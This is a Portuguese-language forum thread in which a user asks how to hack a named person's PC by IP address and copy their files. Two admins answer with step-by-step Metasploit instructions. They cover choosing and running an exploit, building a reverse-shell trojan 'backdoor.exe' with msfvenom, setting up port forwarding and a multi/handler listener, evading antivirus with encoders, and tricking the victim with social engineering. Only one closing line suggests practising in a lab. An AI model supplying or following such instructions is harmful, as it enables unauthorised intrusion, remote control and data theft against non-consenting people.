Conexão Remota e Metaploist

Para mais discussões sobre o uso e emprego de ambos esses assuntos.
Post Reply
Penguin23
Membro
Membro
Posts: 1
Joined: Sat Nov 11, 2017 7:45 pm

Conexão Remota e Metaploist

Post by Penguin23 » Sat Nov 11, 2017 7:49 pm

Como eu me conecto no PC de alguém pelo Metaploist?

Eu quero saber os comandos, eu preciso me conectar no PC da pessoa pelo Metaploist, me mande os comandos para eu fazer isso?

Aí me ensinem também como eu transfiro os dados do PC dele pro meu Computador.

*Comandos
*Passo-a-passo
*Instruções
*Transferencia de Arquivo
*Como usar um Backdoor
*Como enviar a ele
*Como hackear pelo IP

201.10.242.116

Esse é o IP dele, preciso me conectar, mas não sei como, Microsoft não conseguiu resolver p/mim

User avatar
Kodo no Kami
Admin
Admin
Posts: 641
Joined: Fri Jan 02, 2015 1:56 pm
Contact:

Re: Conexão Remota e Metaploist

Post by Kodo no Kami » Sat Nov 11, 2017 11:29 pm

depende muito mano, estabelecer a conexao isso é feito automaticamente atraves do proprio payload escolhido (isso quando o exploit funciona é claro). alguns payloads permite fazer a conexao direta ou seja a sua maquina fazendo a conexao com a da vitima (esses payloads costuma ter o nome bind ex: bind_tcp), outros permite a vitima fazer conexao na maquina do invasor no caso a conexao reversa (normalmente esses payloads tem o nome reverse ex: reverse_tcp), sem dizer que existem N tipo de payloads para diversos tipos de fins, alguns retorna uma shell do sistema invadido como meterprete, outros permite acesso grafico com vnc, alguns permite injeção no alvo, outros comunicação criptografada, alguns funciona em plataformas especificas como windows x64, linux, android e servidores web. depende muito de cada payload e o seu proposito. so lembrando payload é um pequeno codigo que é injetado depois que a maquina é invadido a invasão em si depende da exploração pelo exploit. invasão por exploit depende do serviço rodando que esteja vulneravel (isso depende da versao do programa, do sistema onde esta rodando e etc), outra forma seria usar o payload em um executavel no caso um trojan (que nao e nada mais nada menos que um programa que vai executar o payload), para abrir o metasploit basta abrir o msfconsole

Code: Select all

kodonokami@debian:~$ sudo msfconsole
com o metasploit aberto voce pode listar todos os exploits com o comando show exploits

Code: Select all

msf > show exploits
como exemplo tem o exploit windows/tftp/dlink_long_filename ou seja esse é um exploit para windows que tenha um servidor tftp dlink (D-Link TFTP 1.0) que sera explorado por um Long Filename Buffer Overflow, ou seja para conseguir explorar por essa vulnerabilidade precisa ter um servidor D-Link TFTP com a versao exata 1.0 rodando na vitima, supondo que a vitima tenha um servidor desse rodando para usar esse exploit deve usar o comando "use" seguido dele

Code: Select all

msf > use windows/tftp/dlink_long_filename
depois disso tem que setar as configurações correta para isso se usa show options, para exibir as opções que deve setar algumas sao obrigatorias, tambem no exploit target é mostrado qual a versao do sistema que deve ser explorada (no exemplo é um Windows 2000 SP4 English)

Code: Select all

msf exploit(dlink_long_filename) > show options

Module options (exploit/windows/tftp/dlink_long_filename):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  69               yes       The target port


Exploit target:

   Id  Name
   --  ----
   0   Windows 2000 SP4 English


msf exploit(dlink_long_filename) > 
para setar a opção deve usar o comando set seguido da opção seguido do valor nela (no exemplo so temos o RHOST e o RPORT sendo que o RPORT ja tem um valor padrao)

Code: Select all

msf exploit(dlink_long_filename) > set RHOST 192.168.1.2
RHOST => 192.168.1.2
msf exploit(dlink_long_filename) > 
depois disso deve especificar o payload para isso pode listar todos os payloads com o comando show payloads

Code: Select all

msf exploit(dlink_long_filename) > show payloads
para setar o payload set payload seguido do escolhido

Code: Select all

msf exploit(dlink_long_filename) > set payload windows/meterpreter/bind_tcp
com show options para ver se tem alguma opção nova nele

Code: Select all

msf exploit(dlink_long_filename) > show options

Module options (exploit/windows/tftp/dlink_long_filename):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  192.168.1.2      yes       The target address
   RPORT  69               yes       The target port


Payload options (windows/meterpreter/bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LPORT     4444             yes       The listen port
   RHOST     192.168.1.2      no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Windows 2000 SP4 English


msf exploit(dlink_long_filename) > 
por fim seria apenas usar o comando exploit para explorar caso a vitima tivesse aquele serviço vuln rodando, no caso se tudo desse certo ia retornar a shell do sistema ou do meterpreter (eu caso nao funcionou pq nao tenho nenhum serviço desse rodando na maquina alvo)

Code: Select all

msf exploit(dlink_long_filename) > exploit

[*] Started bind handler
[*] Trying target Windows 2000 SP4 English...
[*] Exploit completed, but no session was created.
msf exploit(dlink_long_filename) > 
basicamente é assim que o metasploit funciona, so que ele tambem nao se limita apenas a isso, voce pode por exemplo usar post que sao codigo pos-exploração, pode customizar exploits, payloads, usar encoders para deixar indetectavel pelo antivirus e etc. para gerar payload no caso trojan deve usar o programa msfvenom passar os argumento como o payload escolhdo e a arquitetura depois abrir o msfconsole e abrir o exploit/multi/handle configurar o mesmo payload nele para ficar esperando conexao, depois enviar para vitima (para isso deve usar engenharia social, sei la upa fala que é um hack de jogo), quando ela executar vai retornar a shell do sistema alvo no msfconsole, depois eu faço um tutorial melhor do que esse, explicando um pouco mais sobre ele kkkk

* no caso a invasão por IP não existe, o ip é um protocolo de endereçamento no caso a invasão ocorre na camada de aplicação na maior parte das vezes de acordo com pilha tcp/ip ou osi, ou seja apenas pelo IP nao da para invadir nada apenas se tiver um serviço rodando em tal porta
Image

Conheça o sistema e manipule ele, se limite ao sistema e seja manipulado por ele ~kodo no kami

meu perfil yahoo

User avatar
51M0N
Admin
Admin
Posts: 846
Joined: Fri Jan 02, 2015 2:06 pm

Re: Conexão Remota e Metaploist

Post by 51M0N » Tue Nov 14, 2017 2:09 pm

Olá Penguin23, complementando o que o kodo disse, se esta fora da rede pensei em algumas formas vou falar da mais fácil(existe muitas outras..ehehehe), embora muitas das vezes firewall,antivírus e etc pode dar block,mas enfim. Veja o desenho abaixo para compreender:

Image

nesse caso tu pode abrir a porta do seu roteador ou usar um vps(essa parte podemos mostrar caso não consiga com que foi mostrado no post), vai precisar do endereço publico na hora de setar o payload, e algumas informações que precisa saber de antemão como seu ip local,público e do roteador.

ip local comando ifconfig você consegue essa informação
ip público entre no site (http://meuip.net.br) para encaminhar corretamente
ip roteador com comando router -n na coluna de gateway que contem flag “UG” será o IP do seu roteador.

Vamos criar o payload
Podemos fazer com o msfvenom, ele e uma combinação de msfpayload e msfencode, pode usar alguns desses comandos[1], mas irei usar esse.

Code: Select all

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp -e generic/none -f exe LHOST= IP PUBLICO LPORT=444 > /root/backdoor.exe
Você terá que fazer o port forwarding no roteador(varia em cada roteador) bem tranquilo, add seu IP:PORTA local da sua maquina atacante, exemplo de configuração do roteador(deve ter algo assim..kk)

Code: Select all

service type:tcp/udp
service ip address: seu ip local
start port: 444
end port: 444
Salve e pronto essa parte esta resolvida.

Agora vamos escutar, para isso vamos iniciar o msfconsole e digite o seguintes comandos

Code: Select all

use multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST IP LOCAL
set LPORT 444
exploit
Assim que sua vítima executar o vírus "backdoor.exe", você receberá uma sessão ai é só utilizar os comandos do meterpreter segue um post que explico algumas funcionalidades que ira te ajudar.

Uma boa leitura inicial dos seguintes livros, vai te ajudar tbm:

➢ Testes de Invasão Uma introdução prática ao hacking de Georgia Weidman
➢ The Penetration Tester's Guide by David Kennedy, Jim O'Gorman, Devon Kearns ...
➢ Nmap Essentials by David Shaw


** recomendo você fazer isso em labs controlado como vms, por motivos éticos para não prejudicar a pessoa para não vir dar problema para você também em um futuro.


inté


Referências
[1] https://www.offensive-security.com/meta ... /msfvenom/
"Você, eu, nem ninguém vai bater tão duro como a vida. Mas não se trata de bater duro. Se trata de quanto você aguenta apanhar e seguir em frente (...). É assim que se consegue vencer." by Rocky Balboa

Post Reply

Return to “VPN / Proxies / Deepweb”